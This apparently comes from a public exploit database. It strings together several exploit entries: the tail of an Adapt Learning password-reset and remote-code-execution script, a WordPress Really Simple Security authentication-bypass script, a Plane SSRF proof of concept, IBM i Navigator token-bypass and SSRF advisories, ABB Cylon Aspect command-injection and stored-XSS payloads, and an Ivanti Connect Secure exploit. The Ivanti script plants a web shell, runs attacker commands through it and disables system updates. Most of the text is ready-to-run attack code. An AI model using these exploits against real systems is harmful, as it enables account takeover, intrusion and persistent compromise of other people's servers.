    plugin_id = find_plugin(session_cookie, "extension", plugin_name)
    if plugin_id is None:
        print(f"[-] {plugin_name} not found")
        sys.exit()
    print(f"[+] Plugin ID : {plugin_id}")

    print("[+] Add plugin to new courses")
    data = {"_isAddedByDefault": True}
    requests.put(
        f"{args.url}/api/extensiontype/{plugin_id}",
        cookies=session_cookie,
        json=data,
    )

    print("[+] Create a new course")
    course_id = create_course(session_cookie)

    print("[+] Build course")
    res = requests.get(
        f"{args.url}/api/output/adapt/preview/{course_id}",
        cookies=session_cookie,
    )

    if res.status_code == 200:
        print("[+] Command execution succeeded")
    else:
        print("[-] Command execution failed")

    print("[+] Remove course")
    requests.delete(
        f"{args.url}/api/content/course/{course_id}",
        cookies=session_cookie,
    )


def main():
    print("[*] Retrieve user information")
    users = get_users()

    print("\n[*] Reset password")
    reset_password(users)

    print("\n[*] Perform remote code execution")
    rce(users)


if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument(
        "-u",
        dest="url",
        help="Site URL (e.g.  www.adaptlearning.org)",
        type=str,
        required=True,
    )
    parser.add_argument(
        "-U",
        dest="username",
        help="Username to authenticate as",
        type=str,
        required=True,
    )
    parser.add_argument(
        "-P",
        dest="password",
        help="Password for the specified username",
        type=str,
        required=True,
    )
    parser.add_argument(
        "-c",
        dest="command",
        help="Command to execute (e.g. touch /tmp/pwned)",
        type=str,
        default="touch /tmp/pwned",
    )
    args = parser.parse_args()

    main()
            
#!/usr/bin/env python3

# Exploit Title: Really Simple Security 9.1.1.1 - Authentication Bypass
# Date: 2024-11-19
# Exploit Author: Antonio Francesco Sardella
# Vendor Homepage: https://really-simple-ssl.com/
# Software Link: https://really-simple-ssl.com/
# Version: Really Simple Security (Free, Pro, and Pro Multisite) 9.0.0 - 9.1.1.1
# Tested on: 'WordPress 6.7.0' in Docker container (vulnerable application), 'Ubuntu 24.04.1 LTS' with 'Python 3.12.3' (script execution)
# CVE: CVE-2024-10924
# Category: WebApps
# Repository: https://github.com/m3ssap0/wordpress-really-simple-security-authn-bypass-exploit
# Vulnerability discovered and reported by: István Márton

# This is a Python3 program that exploits Really Simple Security < 9.1.2 authentication bypass vulnerability.

# This makes it possible for unauthenticated attackers to log in as any existing user on the site, 
# such as an administrator, when the "Two-Factor Authentication" setting is enabled (disabled by default).

# https://www.wordfence.com/threat-intel/vulnerabilities/detail/really-simple-security-free-pro-and-pro-multisite-900-9111-authentication-bypass
# https://plugins.trac.wordpress.org/changeset/3188431/really-simple-ssl

# DISCLAIMER: This tool is intended for security engineers and appsec people for security assessments.
# Please use this tool responsibly. I do not take responsibility for the way in which any one uses 
# this application. I am NOT responsible for any damages caused or any crimes committed by using this tool.

import argparse
import json
import logging
import random
import requests
import string
import validators

from requests.auth import HTTPBasicAuth

VERSION = "v1.0 (2024-11-19)"
DEFAULT_LOGGING_LEVEL = logging.INFO

def parse_arguments():
    parser = argparse.ArgumentParser(
        description=f"Exploit for Really Simple Security < 9.1.2 authentication bypass vulnerability (CVE-2024-10924). - {VERSION}"
    )
    parser.add_argument("-t", "--target",
                        required=True,
                        help="URL of the target WordPress")
    parser.add_argument("-uid", "--user-id",
                        required=False,
                        default=1,
                        help="Victim user ID (1 is usually the admin).")
    parser.add_argument("-v", "--verbose",
                        action="store_true",
                        required=False,
                        default=False,
                        help="verbose mode")
    return parser.parse_args()

def validate_input(args):
    try:
        validators.url(args.target)
    except validators.ValidationFailure:
        raise ValueError("Invalid target URL!")
    
    try:
        if int(args.user_id) < 1:
            raise ValueError("Invalid user ID!")
    except ValueError:
        raise ValueError("Invalid user ID!")

def send_request(url, user_id):
    logging.info("Sending request to target WordPress.")

    target_endpoint = f"{url}"
    if not target_endpoint.endswith("/"):
        target_endpoint = f"{target_endpoint}/"
    target_endpoint = f"{target_endpoint}?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding"

    headers = {
        "Content-Type": "application/json",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36",
    }

    body = {
        "user_id": int(user_id),
        "login_nonce": "".join(random.choices(string.digits, k=10)),
        "redirect_to": "/wp-admin/"
    }
    logging.debug(f"Body: {body}")

    try:
        r = requests.post(target_endpoint, headers=headers, json=body , verify=False)
        logging.info(f"Request sent to target WordPress (HTTP {r.status_code}).")
    except Exception as e:
        logging.fatal("Error in contacting the target WordPress.")
        logging.fatal(e)
        return
    
    if r.status_code == 200 and r.headers["Set-Cookie"] is not None and "redirect_to" in r.text and "=deleted;" not in r.headers["Set-Cookie"]:
        logging.info(f"Cookie received:\n---------------------\n{r.headers["Set-Cookie"]}\n---------------------")
    else:
        logging.fatal("Wrong response received from the target WordPress.")
        logging.debug(f"Cookie and body received:\n---------------------\n{r.headers["Set-Cookie"]}\n---------------------\n{r.text}\n---------------------")

def main():
    args = parse_arguments()
    logging_level = DEFAULT_LOGGING_LEVEL
    if args.verbose:
        logging_level = logging.DEBUG
    logging.basicConfig(level=logging_level, format="%(asctime)s - %(levelname)s - %(message)s")

    validate_input(args)
    target = args.target.strip()
    user_id = int(args.user_id)
    logging.info(f"Exploit for Really Simple Security < 9.1.2 authentication bypass vulnerability (CVE-2024-10924). - {VERSION}")
    logging.debug("Parameters:")
    logging.debug(f"    target = {target}")
    logging.debug(f"   user_id = {user_id}")

    send_request(target, user_id)

    logging.info("Finished.")

if __name__ == "__main__":
    main()
            
# Exploit Title: Plane - Server side request forgery (SSRF)
# Date: 2024-01-13
# Exploit Author: Saud Alenazi
# Vendor Homepage: https://plane.so
# Software Link: https://github.com/makeplane/plane/releases/tag/v0.23.1
# Version: v0.23.1
# Tested: Windows 10 x64

Description:

A Server-Side Request Forgery (SSRF) vulnerability has been identified in the Plane application's password recovery functionality. The issue allows attackers to manipulate the email input field and inject a payload to make the server send HTTP requests to attacker-controlled domains.

Steps to Reproduce:

1- Go to the password recovery or login section where the email input is required.

2- Inject the following payload in the email field, replacing the domain with a server you control:

{"email":"user@lvkrx2ib577fgpfxvq0f9ek0oruiiagy5.oastify.com"}

Send the request:

POST /auth/magic-generate/ HTTP/1.1
Host: 127.0.0.1
Content-Type: application/json
Content-Length: 62

{"email":"user@lvkrx2ib577fgpfxvq0f9ek0oruiiagy5.oastify.com"}

3- Monitor your controlled server to observe the incoming HTTP request from the vulnerable system.
            
# Author Title: John Page (aka hyp3rlinx)		
# Author Website: hyp3rlinx.altervista.org
# Source:  https://hyp3rlinx.altervista.org/advisories/IBMi_Navigator_HTTP_Security_Token_Bypass-CVE-2024-51464.txt
 # Vendor: www.ibm.com

[Product]
Navigator for i is a Web console interface where you can perform the key tasks to administer your IBM i.
IBM Navigator for i supports the vast majority of tasks that were available in the System i Navigator Windows client application.
This Web application is part of the base IBM i operating system, and can be easily accessed from your web browser.

[Vulnerability Type]
HTTP Security Token Bypass

[CVE Reference]
CVE-2024-51464

[Security Issue]
IBM i is vulnerable to bypassing Navigator for i interface restrictions.  By sending a specially crafted request, an authenticated attacker could exploit this
vulnerability to remotely perform operations that the user is not allowed to perform when using Navigator for i.

The web application generates an HTTP security token ID called "Mn:" with a 19 digit value and is set in the HTTP session response header per user.
Navigator, uses this token for integrity purpose to protect against arbitrary and or malicious HTTP requests. Therefore, upon receipt of a bogus
security token in an HTTP request the server will respond with HTTP 403 Forbidden message.

However, attackers can modify existing tokens to bypass the 403 Forbidden directive to achieve their objectives. Problem is Navigator security token logic
does not properly create or detect if a security token is valid or if it has been tampered with.

Attackers can manipulate the last eight digits of a token by setting them to all 0000s (zeroes) and or increment them by one, token length must be the same.
This can trick the application into processing attacker controlled security tokens as the server thinks it is valid, this undermines the security of this protection.

E.g. Valid HTTP header generated by the server.

Mn: 6844795211344371559
Content-Length: 290
Origin: https://10.1.1.4:2003

Example of a bogus but honored MN header token set by an attacker, padded with zeros and happily accepted by the backend servlet.
Mn: 6844795211300000000

The MN token is generated in the "initProtectionSetting" java method.

public void initProtectionSetting(HttpServletRequest request, HttpServletResponse response) {
    initEncryption();
    initSession();

   [ REDACTED ]

    setMagicNumber(magicNumber);
    response.setHeader("MN", magicNumber + "");
    setUserAgent(request.getHeader("User-Agent"));
  }


In the (doFilter) Method we see the check for MN header which sends HTTP 403 on invalid tokens.

     String mnStr = hRequest.getHeader("MN");
        if (mnStr == null)
          mnStr = hRequest.getParameter("MN");
        if (!isMnMatched(mnStr, hSession)) {
          NavLogger.severe("Forbidden. Incorrect HTTP ID");
          NavLogger.info("Request URI: " + requestURI);
          hResponse.sendError(403);
          return;


Invalid token response will return:
Error 403: SRVE38895F: Error reported: 403
 

Attacker increments MN or pad with zeros and requests are accepted and the token succeeds.
HTTP 200 OK


[References]
ADV0142855
https://www.ibm.com/support/pages/node/7179509

IBM classified as "CWE-644: Improper Neutralization of HTTP Headers for Scripting Syntax".
To be clear HTTP headers are just the delivery method for sending attacker controlled tokens to bypass Navigator protection.


[Exploit/POC]
Intercept Navigator HTTP requests and increment the last one or two digits of the Mn: HTTP
header security token or just pad the last eight digits with all zeroes.


[Network Access]
Remote


[Severity]
Medium
CVSS Base score:  4.3

[Affected versions]
7.5.0,7.4.0, 7.3.0


[Disclosure Timeline]
Vendor Notification:  10/14/2024
Vendor fix and publication: 12/20/2024
12/27/2024 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx
            
# Author Title: John Page (aka hyp3rlinx)		
# Author Website: hyp3rlinx.altervista.org
# Source:  https://hyp3rlinx.altervista.org/advisories/IBMi_Navigator_HTTP_Security_Token_Bypass-CVE-2024-51464.txt
# Vendor: www.ibm.com



[Vendor]
www.ibm.com

[Product]
Navigator for i is a Web console interface where you can perform the key tasks to administer your IBM i.
IBM Navigator for i supports the vast majority of tasks that were available in the System i Navigator Windows client application.
This Web application is part of the base IBM i operating system, and can be easily accessed from your web browser.


[Vulnerability Type]
Server Side Request Forgery (SSRF)

[CVE Reference]
CVE-2024-51463

[Security Issue]
IBM i is vulnerable to server-side request forgery (SSRF). This may allow an authenticated attacker to send unauthorized requests from the system,
potentially leading to network enumeration or facilitating other attacks.

post auth server side request forgery on non managed nodes to external hosts on any TCP ports. There are two call vectors that can be abused here,
one is the "Test TLS connection" but it only allows connections to TCP port 9476.

However, there exists another servlet method called "testConnectPort" which an authenticated attacker can use to connect to any IP and PORT
outside of the LAN. This can be abused for port scans, information disclosure, exfil data., bypass firewall rules to attack non managed nodes
or connect to attacker controlled C2 infrastructure.

This SSRF relies on exploiting a HTTP servlet generated security token bypass CVE-2024-51464, where intercepted HTTP request MN tokens are
incremented or padded with zero. This attacker controlled MN token is now seen as valid and the HTTP 403 Forbidden restriction is bypassed.


[Exploit/POC]
1)  attacker payload

POST /Navigator/DispatcherServlet/serviceability/testPortConnection?system=10.1.1.4
{"hostname":"10.2.10.16", "port":445}

2) attackers c2 server

┌──(rootggKali)-[/usr/share]
└─# nc -llvp 445                                                       
listening on [any] 445 ...
connect to [10.2.10.16] from victimhost [10.1.1.4] 44569


For port scan we can infer if external host ports are open or closed using error responses.

Port is open:
Error 500: Connection reset

Port is closed
Error 500: A remote host refused an attempted connect 


[References]
ADV0142856
https://www.ibm.com/support/pages/node/7179509

[Affected versions]
7.5.0,7.4.0, 7.3.0


[Network Access]
Remote


[Severity]
Medium
CVSS Base score:  5.4

Vendor Notification:  10/14/2024
Vendor fix and publication: 12/20/2024
12/27/2024 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx
            
ABB Cylon Aspect 3.08.02 (uploadDb.php)  - Remote Code Execution


Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
                  Firmware: <=3.08.02

Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.

Desc: The ABB Cylon Aspect BMS/BAS controller suffers from an authenticated
OS command injection vulnerability. This can be exploited to inject and execute
arbitrary shell commands through the contents of an uploaded .db file, which
is passed to the copyFile.sh script. Although the filename is sanitized, the
contents of the .db file are not, allowing attackers to inject malicious commands
that are executed on the server.

Tested on: GNU/Linux 3.15.10 (armv7l)
           GNU/Linux 3.10.0 (x86_64)
           GNU/Linux 2.6.32 (x86_64)
           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
           PHP/7.3.11
           PHP/5.6.30
           PHP/5.4.16
           PHP/4.4.8
           PHP/5.3.3
           AspectFT Automation Application Server
           lighttpd/1.4.32
           lighttpd/1.4.18
           Apache/2.2.15 (CentOS)
           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
           ErgoTech MIX Deployment Server 2.0.0


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2025-5904
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5904.php
CVE ID: CVE-2024-48839
CVE URL: CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-48839


21.04.2024

--


$ cat project

                 P   R   O   J   E   C   T

                        .|
                        | |
                        |'|            ._____
                ___    |  |            |.   |' .---"|
        _    .-'   '-. |  |     .--'|  ||   | _|    |
     .-'|  _.|  |    ||   '-__  |   |  |    ||      |
     |' | |.    |    ||       | |   |  |    ||      |
 ____|  '-'     '    ""       '-'   '-.'    '`      |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░  
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░                                                            
         ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ 
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ 
         ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░                                               
                                                                                                               

$ curl -s http://192.168.73.31/uploadDb.php \
> -H "Cookie: PHPSESSID=xxx" \
> -F "userfile=@testingus.db"

$ curl http://192.168.73.31/database/testingus.db
            
ABB Cylon Aspect 3.08.02 (licenseUpload.php) Stored Cross-Site Scripting
Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
                  Firmware: <=3.08.02

Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.

Desc: The ABB Cylon Aspect BMS/BAS controller suffers from an authenticated
stored cross-site scripting (XSS) vulnerability. This can be exploited by
uploading a malicious .txt file containing an XSS payload, which is stored
on the server and served back to users. Although the filename is sanitized
via the filename POST parameter, the file contents are not inspected or
sanitized, allowing attackers to inject arbitrary client-side scripts that
execute in the context of any user accessing the infected file or related
web page (license.php). To bypass file upload checks, the request must include
the Variant string enabling the upload process for potential exploitation.

Tested on: GNU/Linux 3.15.10 (armv7l)
           GNU/Linux 3.10.0 (x86_64)
           GNU/Linux 2.6.32 (x86_64)
           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
           PHP/7.3.11
           PHP/5.6.30
           PHP/5.4.16
           PHP/4.4.8
           PHP/5.3.3
           AspectFT Automation Application Server
           lighttpd/1.4.32
           lighttpd/1.4.18
           Apache/2.2.15 (CentOS)
           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
           ErgoTech MIX Deployment Server 2.0.0


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2025-5905
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5905.php
CVE ID: CVE-2024-6516
CVE URL: CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-6516


21.04.2024

-->



                 P   R   O   J   E   C   T

                        .|
                        | |
                        |'|            ._____
                ___    |  |            |.   |' .---"|
        _    .-'   '-. |  |     .--'|  ||   | _|    |
     .-'|  _.|  |    ||   '-__  |   |  |    ||      |
     |' | |.    |    ||       | |   |  |    ||      |
 ____|  '-'     '    ""       '-'   '-.'    '`      |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░  
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░                                                            
         ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ 
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ 
         ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░                                               
                                                                                                               

<html>
  <body>
    <script>
      function storeit()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http:\/\/192.168.73.31\/licenseUpload.php", true);
        xhr.setRequestHeader("Accept-Language", "mk-MK,mk;q=0.7");
        xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=----WebKitFormBoundarymcNoKljWbBWAldlr");
        xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.7");
        xhr.withCredentials = true;
        var body = "------WebKitFormBoundarymcNoKljWbBWAldlr\r\n" + 
          "Content-Disposition: form-data; name=\"userfile\"; filename=\"test.txt\"\r\n" + 
          "Content-Type: text/lic\r\n" + 
          "\r\n" + 
          "Variant = AspectMAX\r\n" + 
          "\x3cscript\x3econfirm(251)\x3c/script\x3e\r\n" + 
          "------WebKitFormBoundarymcNoKljWbBWAldlr\r\n" + 
          "Content-Disposition: form-data; name=\"submit\"\r\n" + 
          "\r\n" + 
          "Upload\r\n" + 
          "------WebKitFormBoundarymcNoKljWbBWAldlr--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
      storeit();
    </script>
    <form action="#">
      <input type="button" value="Post" onclick="storeit();" />
    </form>
  </body>
</html>
            
ABB Cylon Aspect 3.08.02 (licenseServerUpdate.php) Stored Cross-Site Scripting
Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
                  Firmware: <=3.08.02

Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.

Desc: The ABB BMS/BAS controller suffers from an authenticated stored cross-site
scripting vulnerability. Input passed to the 'host' POST parameter is not
properly sanitised before being returned to the user. This can be exploited
to execute arbitrary HTML/JS code in a user's browser session in context of
an affected site.

Tested on: GNU/Linux 3.15.10 (armv7l)
           GNU/Linux 3.10.0 (x86_64)
           GNU/Linux 2.6.32 (x86_64)
           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
           PHP/7.3.11
           PHP/5.6.30
           PHP/5.4.16
           PHP/4.4.8
           PHP/5.3.3
           AspectFT Automation Application Server
           lighttpd/1.4.32
           lighttpd/1.4.18
           Apache/2.2.15 (CentOS)
           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
           ErgoTech MIX Deployment Server 2.0.0


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2025-5906
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5906.php
CVE ID: CVE-2024-6516
CVE URL: CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-6516


21.04.2024

-->



                 P   R   O   J   E   C   T

                        .|
                        | |
                        |'|            ._____
                ___    |  |            |.   |' .---"|
        _    .-'   '-. |  |     .--'|  ||   | _|    |
     .-'|  _.|  |    ||   '-__  |   |  |    ||      |
     |' | |.    |    ||       | |   |  |    ||      |
 ____|  '-'     '    ""       '-'   '-.'    '`      |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░  
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░                                                            
         ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ 
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ 
         ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░                                               
                                                                                                               

<body>
  <form action="http://192.168.73.31/licenseServerUpdate.php" method="post">
    <input type="hidden" name="licenseServer" value="Server" />
    <input type="hidden" name="host" value="'><script>confirm(document.domain)</script>" />
    <input type="submit" value="Submit" />
  </form>
</body>
</html>
            
# Exploit Title: Ivanti Connect Secure 22.7R2.5  - Remote Code Execution (RCE)
# Date: 2025-01-11
# Exploit Author: @absholi7ly
# CVE: CVE-2025-0282

import requests
import sys
import struct
import socket
import ssl
import urllib3
import time

# Disable SSL warnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def create_exploit_payload(command, offset=500, system_address=0x0804a360, command_address=0x0804b008):

    payload = b"A" * offset  # Fill the buffer
    payload += struct.pack("<I", system_address)  # Overwrite return address with system()
    payload += b"BBBB"  # Fake return address
    payload += struct.pack("<I", command_address)  # Address of the command
    payload += command.encode()  # Command to execute
    return payload

def send_payload(target_ip, payload):

    try:
        context = ssl.create_default_context()
        context.check_hostname = False
        context.verify_mode = ssl.CERT_NONE

        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(5)
        ssl_sock = context.wrap_socket(sock, server_hostname=target_ip)

        ssl_sock.connect((target_ip, 443))
        print(f"[+] Connected to {target_ip} on port 443 (HTTPS).")

        exploit_endpoint = "/dana-na/auth/url_default/welcome.cgi"
        http_request = (
            f"POST {exploit_endpoint} HTTP/1.1\r\n"
            f"Host: {target_ip}\r\n"
            f"Content-Length: {len(payload)}\r\n"
            f"Content-Type: application/x-www-form-urlencoded\r\n"
            f"\r\n"
        ).encode() + payload

        ssl_sock.send(http_request)
        response = ssl_sock.recv(4096)
        ssl_sock.close()
        return response.decode(errors="replace")

    except Exception as e:
        print(f"[-] Error sending payload: {e}")
        return None

def exploit_vulnerability(target_ip, command):

    payload = create_exploit_payload(command)
    response = send_payload(target_ip, payload)
    if response:
        print("[+] Payload sent successfully.")
    else:
        print("[-] No response received.")

def upload_web_shell(target_ip, local_shell_path):

    try:
        with open(local_shell_path, "r") as f:
            web_shell_content = f.read()

        command = f"echo '{web_shell_content}' > /shell.php"
        exploit_vulnerability(target_ip, command)
        print("[+] Web shell uploaded successfully at /shell.php.")
        verify_shell(target_ip)

    except Exception as e:
        print(f"[-] Error uploading web shell: {e}")

def verify_shell(target_ip):

    shell_url = f"http://{target_ip}/shell.php"
    try:
        response = requests.get(shell_url, verify=False, timeout=10)
        if response.status_code == 200:
            print("[+] Web shell is accessible.")
        else:
            print(f"[-] Web shell is not accessible. HTTP status: {response.status_code}")
    except Exception as e:
        print(f"[-] Error verifying web shell: {e}")

def execute_shell_command(target_ip, command):

    shell_url = f"http://{target_ip}/shell.php"
    try:
        # Sending the command via POST
        response = requests.post(shell_url, data={"cmd": command}, verify=False, timeout=10)
        if response.status_code == 200:
            print(f"[+] Command output:\n{response.text.strip()}")
        else:
            print(f"[-] Failed to execute command via shell. HTTP status: {response.status_code}")
    except Exception as e:
        print(f"[-] Error executing command via web shell: {e}")

def disable_updates(target_ip):

    commands = [
        "systemctl stop apt-daily.service",
        "systemctl disable apt-daily.service"
    ]
    for command in commands:
        execute_shell_command(target_ip, command)
    print("[+] System updates disabled successfully.")


def main():

    if len(sys.argv) != 3:
        print("Usage: python3 cve_2025_0282.py <target IP> <local_shell_path>")
        sys.exit(1)

    target_ip = sys.argv[1]
    local_shell_path = sys.argv[2]

    # Upload the web shell
    upload_web_shell(target_ip, local_shell_path)

    while True:
        command = input("Enter command to execute on the target (or 'exit' to quit): ")
        if command.lower() == "exit":
            print("Exiting...")
            break

        execute_shell_command(target_ip, command)

if __name__ == "__main__":
    main()
            
ABB Cylon Aspect 3.08.02 (webServerUpdate.php) Input Validation Config Poisoning
Vendor: ABB Ltd.
Product web page: https://www.global.abb
